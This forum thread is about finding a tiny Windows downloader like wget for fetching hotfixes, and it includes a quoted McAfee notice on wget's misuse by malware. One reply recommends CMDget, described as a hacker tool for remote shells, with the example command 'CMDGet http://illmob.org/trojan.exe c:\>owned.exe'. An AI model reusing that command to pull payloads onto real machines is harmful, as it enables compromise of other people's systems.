WGET & MD5

[GreenMachine]

HELP!

Somebody on this forum (I first thought Bilou_Gateux, then Jjazz) suggested I use WGET to download the hotfixes, and posted a link to a VERY, VERY small version of WGET. This version was one used by virus/trojans, that would silently download a file, and then silently launch the program. The file size was, as I said, very, very small: under 10 Kb. The same person also posted a link to an equally small MD5 CheckSum routine, again under 5 Kb. The WGET routine also showed up in McAfee as a trojan/virus.

I've been searching for a few hours now, and I cannot find the post, the copy of the files I thought I had, or a link to these miniscule versions.

If anyone has a link to the post or the files, or would be so kind as to zip and attach the files, they will "make my day".

Anyone?

[swampy]

The smallest wget I can find weighs in at 109,736 bytes, here:

http://wget.techknight.com/download.php

it's half the size of the wget I use for updating my f-prot bootCD.

[GreenMachine]

Thanks much, swampy.

The version I seem to remember (and I'm loosing my mind trying to find) was wicked small. I think it had very limited functionality, but it would do just what I need. I'm sure someone posted it on the XPCREATE forum, and I'm going nuts trying to find it.

I guess it's bedtime in this northern, western hemisphere: maybe my memory/eyes/search will work better tomorrow.

Thanks again for posting, and the link.

[Virindi]

They probably did customize a version of wget, and then compressed it with UPX or something similar.

I can't find a miniature version of wget, lynx, or curl for windows. :\ So I tested compressing it myself:

http://www.interlog.com/~tcharron/wgetwin.html

wget 1.5.3: compresses to 76k with UPX. I can't find anything smaller at the moment, but I will keep an eye out.

[GreenMachine]

Thanks, Virindi. I'm begining to wonder if that post has been deleted. I think it was near a post you did that mentioned the UPX compressed version. The one I saw was very very small: I thnk only a few Kbyte. Somehow that file lead me to a site, and there was also a small FTP/Web server, which make me think of the Worm/Trojan aspect. This WGET version also launched the downloaded file, as an option. It also seemed to do little else, other than download: that is what I am looking for the HotFix downloader. WGET has many options, most of which I would not need. I do think it was Jjazz that had posted it. (Where are you, Jjazz? Vacation time in France?)

Thanks again for the reply, but I really do want to find that version. I guess I'll just keep bumping these posts till I get it!

[sleepnmojo]

Do you have the name of the trojan it was listed as? It may be easier to find the trojan, and pull it from there than finding it in the board.

[GreenMachine]

Sorry, I don't. I've also been googling +trojan +wget +"web server" +tutorial, in varying combinations. Checked with the AV sites, etc ... Now I'm in the process of reading every thread in this forum. Boring ...

Thanks for the suggestion!

[Bilou_Gateux]

not a reduced wget.exe version but a hacker tool which do his job fine :

CMDget.exe - 1.5kb - Downloads a file from a website from user provided parameters

( Example: CMDGet http://illmob.org/trojan.exe c:\>owned.exe )

md5.exe - 15kb - gets the md5 hash of a file

small collection of tool i use regularly in a remote shell/cmd prompt

CMDget.exe

PM sent

[GreenMachine]

BIG THANKS

go out to Bilou_Gateux for ending my 2 day quest. I was wrong, it was CMDGET that I was thinking of, not WGET.

[urgan]

Too late i guess, but found a "httpget" under 18k

here

Also has a tiny sha-160 checker.

[GreenMachine]

Never too late: checking it out now.

In fact, I am leaning towards WGET at this point, for many reasons, but I was going out of my mind looking for that other one. Who said I was stubburn?

[DisabledTrucker]

The following is an excerpt from McAfee.com:

Threat Profile: Tool-WGet

Risk Assessment

- Home Users: N/A

- Corporate Users: N/A

Date Discovered: 8/1/2002

Date Added: 3/17/2004

Origin: Unknown

Length: Varies

Type: Program

SubType: Win32

DAT Required: 4218

Program Characteristics

This is not a virus or trojan. It is a legitimate application for retrieving files from the Internet via HTTP and FTP. The application has been misused by certain pieces of malware in order to facilitate remote downloads.

The exact file size varies (there are many different versions), and it may be packed with a PE packer (eg. UPX, Aspack). Malware that use this tool maliciously typically do so using the quiet switch, disabling screen output.

Users who would like to check for the presence of potentially unwanted programs on their system should run the command line scanner with the /PROGRAM switch.

Please note that VirusScan 7, and higher, has an option that enables users to detect this kind of program automatically (see below).

Symptoms

N/A This is not a virus or trojan. It is a legitimate application which enables remote files to be downloaded from the Internet via HTTP or FTP.

Removal Instructions

For VirusScan 4.x users who would like to detect this program on their system, they can run the command line scanner with the /PROGRAM switch.

Click the START button

Click RUN

Type COMMAND and hit ENTER

Type:

c:\progra~1\common~1\networ~1\viruss~1\4.0.xx\scan.exe c: /program /sub

and hit ENTER.

Users running VirusScan 7 or later can also enable application or joke detection via the configuration option "Find potentially unwanted programs" (Advanced section - see example below), within the VirusScan GUI as shown below:

Corporate Users:

This applies for the VirusScan 7 Enterprise On-Access scanner too.

Retail Users:

This does not apply for the VirusScan 7 Retail On-Access scanner.

(Pictures omitted.) HTH.

For a link to the exact place at McAfee.com:

W-Get virus information.

*edit* google search for: PE Packer W-Get

[Alanoll]

Now that would be really amusing, thought not for GM. Install XPcreate, and the virusscanner reports a virus. lol. Sorry, couldn't resist.

[GreenMachine]

Actually, I knew I left a copy on someone's machine, so I had them do the command line McAfee Virus Scan to find it. Just wasn't the correct version (or name). On the other hand, it did not find CMDGet ...

[DisabledTrucker]

I also found this too, http://www.msfn.org/board/index.php?act=ST&f=80&t=16094 not sure if that's what your looking for or not, both Aaron and Bombtrack mention it. Bombtrack has the instructions for it in his post. Not sure if that's what your looking for though or not. When you do the search use W-Get that may help you find what your looking for.